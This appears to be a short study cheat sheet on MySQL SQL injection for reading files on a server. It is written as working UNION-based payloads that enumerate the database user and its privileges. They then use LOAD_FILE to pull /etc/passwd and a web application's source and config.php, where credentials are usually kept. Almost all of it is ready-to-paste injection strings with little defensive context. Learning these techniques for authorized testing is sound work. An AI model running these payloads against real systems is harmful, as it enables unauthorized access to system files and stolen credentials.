Skip to content

Reading Files

  • If we are a privileged user, and have the FILE privilege, we can read files.
  • database administrator (DBA) privileges are usually allowed to read data

Find User:

SELECT USER()
SELECT CURRENT_USER()
SELECT user from mysql.user
- Incorporating it in our UNION queries: - IN' UNION SELECT 1, user(), 3, 4# - IN' UNION SELECT 1, user, 3, 4 from mysql.user# - - This means we are the root user for the DBMS

Find User privileges:

SELECT super_priv FROM mysql.user 
SELECT super_priv FROM mysql.user WHERE user="root"
- IN' UNION SELECT 1, super_priv, 3, 4 FROM mysql.user# - - Y suggests we have superuser privileges

List privileges given to our user:

  • IN' UNION SELECT 1, grantee, privilege_type, 4 FROM information_schema.user_privileges WHERE grantee="'root'@'localhost'"# -
  • We want to use the FILE priv

LOAD_FILE()

  • IN' UNION SELECT 1, LOAD_FILE("/etc/passwd"), 3, 4#

  • IN' UNION SELECT 1, LOAD_FILE("/var/www/html/search.php"), 3, 4#

    • this renders the same page in response but the page source now includes the whole file which shows a config.php page which is interesting.
  • IN' UNION SELECT 1, LOAD_FILE("/var/www/html/config.php"), 3, 4#